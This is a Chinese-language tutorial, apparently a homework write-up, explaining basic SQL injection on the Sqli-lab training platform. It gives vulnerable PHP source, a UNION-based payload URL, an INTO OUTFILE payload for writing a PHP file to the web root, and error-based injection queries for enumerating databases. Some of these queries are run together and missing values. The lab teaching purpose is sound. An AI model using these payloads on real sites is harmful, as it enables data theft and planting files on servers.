6月份作业之SQL注入基础-基于Sqli-lab平台

简介：SQL注入是一个常见的漏洞，在所有的安全防护统计数据儿结果中显示，SQL注入几乎占据网络攻击问题的60%左右，由此可见SQL注入漏洞是一种常见的WEB漏洞，了解SQL注入对于网络安全工作者或安全爱好者来说，是非常有必要，本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。0x00 SQL注入漏洞简介有关SQL注入的各种定义阐述已经很多，大家可自行使用搜索引擎搜索即可，小东不再赘述。0x01 SQL注入产生的原因简单来说，每天熬夜敲代码的程序员，写程序的时候，没有考虑到程序在与数据库交互时会产生一些安全问题，倘若没有对用户输入的数据正确判断、过滤，就会导致用户可以构造恶意的payload来获取更多的数据()，甚至是Download数据库，导致信息泄漏，甚至导致受害人受到人身攻击或威胁。0x02 SQL注入检测方式常见的SQL注入是基于sql语言来的，有这三种SQL语句，注入原理都是类似的，了解一下SQL语法即可，下面以SELECT查询语句为例子。1. SELECT 类型这种SQL语句就是查询语句，一般用于数据查询，例如网站的数据搜索功能、新闻文章展示、用户资料调取等等，因为网站的绝大部分数据都是存放在数据库中（当然数据库也有很多类型，常见的有MYSQL MSSQL SQLSEVER ACCESS...）。下面小东就基于Sqlilab的Less1 来演示

源码：

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting();

if(isset($_GET['id']))

{

$id=$_GET['id'];//获取id值

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";//SQL查询语句

$result=mysql_query($sql);

$row=mysql_fetch_array($result);

if($row)//如果有数据，查询到了结果（根据sql语句输出条件还可以盲注，以后再讲）

{

echo"";

echo'Your Login name:'.$row['username'];

echo"

";

echo'Your Password:'.$row['password'];

echo"";

}

else//否则输出错误消息

{

echo'';

print_r(mysql_error());//此处输出了mysql的错误消息，正常的线上产品，这种调试输出的语句都得注释或删除

echo"";

}

}

else{echo"Please input the ID as parameter with numeric value";}//如果用户没有传递id值则在页面输出这一句话，如第一幅图所示

?>

2.检测SQL注入通过上面的源码分析，如果我们的SQL语句有错误，那么将会输出错误信息，也就说明了SQL语句没有正确执行，用户提交的而数据导致了程序原本的SQL语句失效。检测方法常见在参数后面加上等等来判断是否存在SQL注入(是否过滤)，如下所示

3.构造Payload

http://www.test.com/Less-1/index.php?id=-1%27%20union%20select%20user(),database(),version()%20%23

妥妥的SQL注入，一般情况下，注入是不会有数据回显的，这时候我们就可以通过SQL盲注的方式，或者简单粗暴的SQL查询写文件的方式，盲注挺麻烦的，一个个手工猜解当然是不可能的，当我们构造好了payload只需要用Python写个脚本，跑一下就行了，SQL盲注放到下篇文章再讲，写文件的方式需要：

知道绝对路径

知道该文件有可写入的权限，一般选择缓存文件夹cache

如下可写入文件：

http://www.test.com/Less-1/index.php?id=-1%27%20union%20select '' into outfile 'D:\\Server\\sqli\\Less-1\\1.php' %23

访问，即可在当前Less-1目录下生成一个1.php文件，会显示输出信息访问：http://www.test.com/Less-1/1.php

0X03 总结

总的来说，SQL注入漏洞很常见，在代码审计的时候是一个需要格外重视的漏洞，即使程序有做过滤，多思考，结合程序其他的漏洞，配合起来就可以绕过过滤，文章有不妥之处，还望批评指正，联系QQ：！0x04 更多解题过程Word文档下载地址：蓝奏网盘：https://www.lanzous.com/i18ww4h百度网盘：https://pan.baidu.com/s/1_yNCrK4uMm7rCNzWIdVthw0x05 补充Mysql中的注释符

#

--

/*...*/

/*!...*/内联注释/*!50select*/（mysql版本大于50执行）常见函数

 system_user() 系统用户名

 user() 用户名

 current_user() 当前用户名

 session_user() 连接数据库的用户名

database() 数据库名

 version() MYSQL数据库版本

 load_file() MYSQL读取本地文件的函数

 @@datadir 读取数据库路径

 @@basedir MYSQL 安装路径

 @@version_compile_os 操作系统 Windows Server2003字符串拼接函数：

concat(str1,str2)

concat_ws(separator, str1,str2...)

group_concat(str1,str2......)

布尔注入、延时注入用到的一些 函数需要掌握的几个函数：

1， exists()

2， ascii()

3， substr()

exists()函数：

esists 用于检查子查询是否会返回一行数据，该子查询实际上并不返回任

何数据，而是返回True或False。

ascii()函数：

返回字符串str的最左面字符的ASCII代码值。如果str是空字符串，返回0。如果

str是NULL，返回NULL。

substr( ) 函数：

substr(string, num start, num length) start #从第1位开始，。

string 为字符串；

start为起始位置；

length为长度。

substr(database(),1,1); xss

x

limit,1

查询的位置，0表示第一行，

1查询的条数报错注入用到的一些函数

floor()

floor(x),有时候也写做Floor(x)，其功能是“向下取整”，或者说“向下

舍入”，即取不大于x的最大整数

1.select*fromadminswhereid=1and(select1from(selectcount(*)

,concat(user(),floor(rand()*2))xfrominformation_schema.tablesgr

oupbyx)a);

2.获取有多少个数据库and(select1from(selectcount(*),concat((select

(select(selectconcat(0x7e,count(schema_name),0x7e)from

information_schema.schemata))frominformation_schema.tables

limit,1),floor(rand()*2))xfrominformation_schema.tablesgroup

byx)a)

通过limit 获取所有数据库名

and(select1from(selectcount(*),concat((select

(select(selectconcat(0x7e, schema_name,0x7e)

frominformation_schema.schematalimit,1))frominformation_schema.tableslimit

,1),floor(rand()*2))xfrom

information_schema.tablesgroupbyx)a)常见报错函数：